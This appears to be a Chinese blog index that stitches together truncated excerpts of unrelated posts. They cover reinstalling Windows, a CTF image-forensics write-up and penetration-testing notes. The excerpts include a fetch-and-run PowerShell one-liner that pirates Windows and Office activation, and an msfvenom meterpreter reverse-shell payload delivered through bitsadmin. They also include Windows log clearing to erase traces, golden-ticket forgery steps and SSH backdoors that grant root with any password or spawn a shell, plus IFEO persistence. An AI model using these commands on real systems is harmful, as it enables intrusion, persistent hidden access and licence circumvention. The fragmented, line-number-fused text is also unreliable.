什么情况下需要重装系统
系统功能严重异常、无法修复,会出现蓝屏、黑屏、死机、卡顿,或者直接或者直接没办法正常开机了。
安装了应用软件后,机器报错,无论怎么卸载重装软件都无法正常运行。
系统内杂乱软件太多,硬盘爆满,无论怎么清理都腾不出空间,重要资料已经挪走了,还是有很多自己不知道的东西占了电脑硬盘空间,想直接一下子全部清理掉。
电脑用太久了,想升级新版本系统,体验新界面、新功能。
朋友、对象的电脑坏了,或者女同学的电脑出问题了,请你帮忙重装。
备份重要文件
准备一个大一点的移动硬盘,把你重要的照片、视频、文件、备份好的聊天记录等数据拷贝出来。
OS镜像恢复部分笔记本自带了官方的恢复镜像
它跟 Windows自带的系统重置完全不同
它相当于在第三方系统里把预先安装好的Windows镜像解压缩一遍覆盖重新安装
而Windows重置是在目前已经安装好、使用过的系统上进行重新擦除、修正错误
本质不同,对应的效果也不同
如果原装的恢复分区被破坏了这个功能就失效了
只能用普通的方法重装,一样是没有办法通过这个功能进行系统重装还原的
如何跳过联网shift+F10打开cmd
输入oobe\\B ...
激活方式首先打开powershell
然后输入一下内容
1irm https://massgrave.dev/get | iex
此时如果你需要激活Windows就输入1
如果需要激活Office,就先输入2再输入1
然后Windows和Office就能永久激活啦
HWID使用产品:Win10、Win11
限制条件:仅适用于上述系统
有效期:永久
特点:硬件没有大变化,系统重装也不怕
Ohook使用产品:Office(2010、UWP版本除外)
限制条件:系统版本不能低于Windows*
有效期:永久
特点:真正的永久激活
KMS38使用产品:Win10、Win11、Windows Server
限制条件:仅适用于上述系统
有效期:2038年1月19日
特点:相比于传统的KMS激活,时间要久一点
Online KMS使用产品:绝大多数Windows和Office,详细名单看链接
限制条件:KMS实际可以离线激活,但该脚本必须联网
有效期:180天
特点:支持的产品数量最多
详细名单 https://massgrave.dev/online_kms.html
HEU_KMS_A ...
Web 架构篇&域名&语言&中间件&数据库&系统&源码获取知识点1、打点-Web 架构-语言&中间件&数据库&系统等
2、打点-Web 源码-CMS 开源&闭源售卖&自主研发等
3、打点-Web 源码获取-泄露安全&资源监控&其他等
4、打点-Web 域名-子域名&相似域名&反查域名&旁注等
信息点基础信息,系统信息,应用信息,防护信息,人员信息,其他信息等
技术点CMS 识别,端口扫描,CDN 绕过,源码获取,子域名查询,WAF 识别,负载均衡识别等
资产泄漏&CMS 识别&Git 监控&SVN&DS_Store&备份知识点CMS 指纹识别源码获取方式习惯&配置&特性等获取方式3、托管资产平台资源搜索监控
详细点参考:https://www.secpulse.com/archives/124398.html
源码泄漏原因1、从源码本身的特性入口
2、从管理员不好的习惯入口
3、从管理员不好的配置入口
4 ...
操作系统&名词&文件下载&反弹SHELL&防火墙绕过
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK 等
参考:
https://www.cnblogs.com/sunny11/p/13583083.htmlhttps://forum.ywhack.com/bountytips.php?downloadhttps://forum.ywhack.com/reverse-shell/https://blog.csdn.net/weixin_43303273/article/details/83029138
Web应用&架构搭建&漏洞&HTTP数据包&代理服务器
网站搭建前置知识域名,子域名,DNS,HTTP/HTTPS,证书等
WEB 应用环境架构类理解不同 WEB 应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统 ...
misc打不开的图片1用winhex查看
文件头很像jpg格式,但是少了两个字节D8 FF,手动补上字节并把文件名后缀改为jpg打开
后缀名字改为.jpeg
然后https://exif.tuchong.com/
查看信息
打不开的照片2
直接改文件头,改成png的
狗子(1) 普通的猫
winhex查看即可
狗子(2) 照片
这到底是为什么呢
后面看wp,发现说图片太大?
狗子(4)故乡话
将False 改为0,将True改为1会直观很多
把0改.
1改0
明显多了,看大佬wp说是附魔台的语言
moectf{dontanswer}
还有另一种方法
1234567891011121314from PIL import Imageim = Image.new('RGB',(60,7),'white')with open('./attachment.txt','r')as f: lines = f.readlines() for y in range(l ...
Windows下文件传输BitsadminBITSAdmin 是一个命令行工具,可以使用它创建下载或上传作业,并监视其进度。
bitsadmin | Microsoft Docsbitsadmin 示例 | Microsoft Docs
msfvenom生成Payload
1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=6666 -f hta-psh > 6666.hta
启动Apache2服务,托管Payload
12345#启动apache2服务service apache2 start#复制payload到web根目录cp 6666.hta /var/www/html/
bitsadmin 下载 Payload
1bitsadmin /transfer shell http://192.168.247.135/6666.hta C:\windows\temp\6666.hta
启动metasploit监听器
12345# 进入msfcon ...
痕迹清除简介在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者通常会对Windows日志进行清除和绕过。
Windows痕迹清除Windows日志
如何查看
事件查看器 -> windows日志
12win + reventvwr.msc
保存路径
123C:\Windows\System32\winevt\Logs\%systemroot%\System32\winevt\Logs\
包括五个类别:应用程序、安全、Setup、系统、转发事件
1powershell -c "Get-WinEvent -FilterHashtable @{logname='Application';}"
系统日志:System
记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。
应用程序日志:Application
包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志 中记录文件错误, ...
PTT
PASS The Ticket
黄金票据伪造原理
2.2 AS确认Client端登录者用户身份
KDC返回的 Msg B:使用 TGS密钥(KDC HASH / KRBTGT用户NTLM HASH) 加密的 TGT (TicketGranting-Ticket),当我们获取到krbtgt用户的 NTLM 哈希后,便可主动使用 krbtgt 用户的NTLM 哈希做为 TGS 密钥来生成 TGT 发送给KDC,这样KDC如果通过解密伪造 TGT 获取到伪造的[CLIENT/TGS SESSIONKEY] 可以成功解密 Authenticator 1 并完成与TGT中的数据进行比对,便成功骗过了KDC,也就是成功伪造了黄金票据
黄金票据伪造条件
域名称
域的SID值
域的 KRBTGT 账户密码 HASH
伪造用户名,可以是任意的
利用步骤
域名称(kc.local)
1whoami
域SID
12whoami /userwmic useraccount list brief
S-1-5-21-1444815315-2181078613-13 ...
SSH后门软链接SSHd123ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345ssh root@192.168.78.19 -p 12345
输入任意密码就可以 root 用户权限登陆,如果 root 用户被禁止登陆时,可以利用其他存在的用户身份登陆
Linux的一个后门引发对PAM的探究
SSH Server Wrapper1234567#!bashcd /usr/sbinmv sshd ../binecho '#!/usr/bin/perl' >sshdecho 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshdecho 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd
1socat STDIN TC ...
权限维持简介为了保证获取到的目标权限不会因为漏洞的修复而丢失,攻击者通常会在目标上安装一个后门,来保证对目标的持久化控制。
系统工具替换后门简介Windows 的辅助功能提供了额外的选项(屏幕键盘,放大镜,屏幕阅读等),可以帮助特殊人士更容易地使用操作系统。
然而,这种功能可能会被滥用于在启用 RDP 并获得 Administrator 权限的主机上实现持久化访问。这种技术会接触磁盘,或者需要修改注册表来执行远程存储的 payload。
涉及到的注册表项为 IFEO(Image File Execution Options),默认是只有管理员和Localsystem有权读写修改。
1HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
原理当我们按照常理运行属于IFEO列表的文件的时候(即可执行文件名在上述的注册表项下,出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就可以正常运行。)会 ...